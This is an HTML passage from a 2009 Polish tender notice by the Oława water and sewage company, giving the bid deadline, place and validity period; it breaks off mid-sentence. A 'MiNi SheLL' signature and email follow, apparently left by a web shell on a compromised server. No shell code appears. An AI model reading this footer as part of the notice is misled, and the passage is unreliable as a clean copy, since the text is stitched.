<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 11:00, miejsce: Zakład Wodociągów i Kanalizacji Spółka z ograniczoną odpowiedzialnością w Oławie,
55-200 Oława, ul. 3 Maja 30, pok. 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest planowany

Creat By MiNi SheLL
Email: jattceo@gmail.com